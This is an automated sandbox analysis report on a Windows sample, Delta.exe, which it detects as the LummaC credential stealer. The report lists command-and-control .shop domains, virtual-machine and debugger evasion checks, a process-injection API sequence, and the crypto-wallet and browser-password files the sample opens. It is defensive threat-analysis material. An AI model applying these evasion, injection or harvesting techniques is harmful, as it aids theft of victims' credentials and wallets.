Source: Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791271518.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/k
Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/ll
Source: Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/micros
Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/oft.coc
Source: Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/w
Source: Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/apiUserUserUser
Source: Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Delta.exe, 00000002.00000003.1716411891.00000000054C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Delta.exe, 00000002.00000003.1728054316.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716651984.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716411891.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716550864.0000000005477000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Delta.exe, 00000002.00000003.1716550864.0000000005452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Delta.exe, 00000002.00000003.1728054316.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716651984.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716411891.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716550864.0000000005477000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Delta.exe, 00000002.00000003.1716550864.0000000005452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005FEA8E	0_2_005FEA8E
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005F3440	0_2_005F3440
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_00600502	0_2_00600502
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005EDDE2	0_2_005EDDE2
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005E96DB	0_2_005E96DB

Source: C:\Users\user\Desktop\Delta.exe

Code function: String function: 005E9BF0 appears 47 times

Source: Delta.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Delta.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003326570404723
Source: Delta.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003326570404723

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@1/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03

Source: C:\Users\user\Desktop\Delta.exe

Command line argument: T_

0_2_005F5440

Source: Delta.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Delta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Delta.exe, 00000002.00000003.1728091361.0000000005426000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716220838.0000000005456000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1728262334.0000000005433000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1728184322.000000000542F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Delta.exe

File read: C:\Users\user\Desktop\Delta.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Delta.exe "C:\Users\user\Desktop\Delta.exe"
Source: C:\Users\user\Desktop\Delta.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Delta.exe	Process created: C:\Users\user\Desktop\Delta.exe "C:\Users\user\Desktop\Delta.exe"
Source: C:\Users\user\Desktop\Delta.exe	Process created: C:\Users\user\Desktop\Delta.exe "C:\Users\user\Desktop\Delta.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Delta.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Delta.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Delta.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Delta.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Delta.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Delta.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005E9DAA push ecx; ret	0_2_005E9DBD
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31AAF push ds; ret	2_3_02C31B7E
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31AAF push ds; ret	2_3_02C31B7E
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31AAF push ds; ret	2_3_02C31B7E
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31AAF push ds; ret	2_3_02C31B7E
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31AAF push ds; ret	2_3_02C31B7E
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31A2E push ds; ret	2_3_02C31A5A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31A2E push ds; ret	2_3_02C31A5A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31A2E push ds; ret	2_3_02C31A5A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31A2E push ds; ret	2_3_02C31A5A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C31A2E push ds; ret	2_3_02C31A5A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C35367 push eax; ret	2_3_02C3536A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C35367 push eax; ret	2_3_02C3536A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C35367 push eax; ret	2_3_02C3536A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C35367 push eax; ret	2_3_02C3536A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C35367 push eax; ret	2_3_02C3536A
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C3 push ecx; ret	2_3_02C350C6
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C3 push ecx; ret	2_3_02C350C6
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C3 push ecx; ret	2_3_02C350C6
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C3 push ecx; ret	2_3_02C350C6
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C3 push ecx; ret	2_3_02C350C6
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C390C7 push 5402C35Eh; ret	2_3_02C390FA
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C390C7 push 5402C35Eh; ret	2_3_02C390FA
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C390C7 push 5402C35Eh; ret	2_3_02C390FA
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C390C7 push 5402C35Eh; ret	2_3_02C390FA
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C390C7 push 5402C35Eh; ret	2_3_02C390FA
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C9 push ecx; ret	2_3_02C350CA
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C9 push ecx; ret	2_3_02C350CA
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C9 push ecx; ret	2_3_02C350CA
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C9 push ecx; ret	2_3_02C350CA
Source: C:\Users\user\Desktop\Delta.exe	Code function: 2_3_02C350C9 push ecx; ret	2_3_02C350CA

Source: C:\Users\user\Desktop\Delta.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Delta.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Delta.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Delta.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Delta.exe

Code function: 2_3_02C3FA4A str word ptr [eax+02C3F420h]

2_3_02C3FA4A

Source: C:\Users\user\Desktop\Delta.exe

Window / User API: threadDelayed 7035

Jump to behavior

Source: C:\Users\user\Desktop\Delta.exe TID: 7416	Thread sleep time: -210000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe TID: 7516	Thread sleep count: 7035 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Delta.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Delta.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Delta.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005FB6E8 FindFirstFileExW,		0_2_005FB6E8
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005FB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_005FB799

Source: Delta.exe, 00000002.00000002.2943435451.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(\
Source: Delta.exe, Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Delta.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Delta.exe

Code function: 0_2_005E9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_005E9A73

Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_0061019E mov edi, dword ptr fs:[00000030h]		0_2_0061019E
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005E1BA0 mov edi, dword ptr fs:[00000030h]		0_2_005E1BA0

Source: C:\Users\user\Desktop\Delta.exe

Code function: 0_2_005F7020 GetProcessHeap,

0_2_005F7020

Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005E9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005E9A73
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005E9A67 SetUnhandledExceptionFilter,	0_2_005E9A67
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005F1A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005F1A60
Source: C:\Users\user\Desktop\Delta.exe	Code function: 0_2_005E96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_005E96B3

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Delta.exe

Code function: 0_2_0061019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_0061019E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Delta.exe

Memory written: C:\Users\user\Desktop\Delta.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: fancywaxxers.shop

Source: C:\Users\user\Desktop\Delta.exe

Process created: C:\Users\user\Desktop\Delta.exe "C:\Users\user\Desktop\Delta.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Delta.exe	Code function: EnumSystemLocalesW,	0_2_005FB0C5
Source: C:\Users\user\Desktop\Delta.exe	Code function: EnumSystemLocalesW,	0_2_005F68FD
Source: C:\Users\user\Desktop\Delta.exe	Code function: GetLocaleInfoW,	0_2_005FB110
Source: C:\Users\user\Desktop\Delta.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_005FB1B7
Source: C:\Users\user\Desktop\Delta.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_005FAA37
Source: C:\Users\user\Desktop\Delta.exe	Code function: GetLocaleInfoW,	0_2_005FB2BD
Source: C:\Users\user\Desktop\Delta.exe	Code function: GetLocaleInfoW,	0_2_005F63F5
Source: C:\Users\user\Desktop\Delta.exe	Code function: EnumSystemLocalesW,	0_2_005FAC88
Source: C:\Users\user\Desktop\Delta.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_005FAD30
Source: C:\Users\user\Desktop\Delta.exe	Code function: GetLocaleInfoW,	0_2_005FAFF0
Source: C:\Users\user\Desktop\Delta.exe	Code function: EnumSystemLocalesW,	0_2_005FAF83

Source: C:\Users\user\Desktop\Delta.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Delta.exe

Code function: 0_2_005EA335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_005EA335

Source: C:\Users\user\Desktop\Delta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768712559.000000000544A000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768871713.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768788870.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1769014343.000000000544D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Delta.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Delta.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Delta.exe	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: Delta.exe, 00000002.00000003.1755498319.0000000002C12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Delta.exe	String found in binary or memory: Jaxx Liberty
Source: Delta.exe, 00000002.00000003.1755498319.0000000002C12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Delta.exe	String found in binary or memory: ExodusWeb3
Source: Delta.exe, 00000002.00000003.1755498319.0000000002C12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Delta.exe, 00000002.00000003.1755336348.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Delta.exe, 00000002.00000003.1755267011.0000000002C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Delta.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
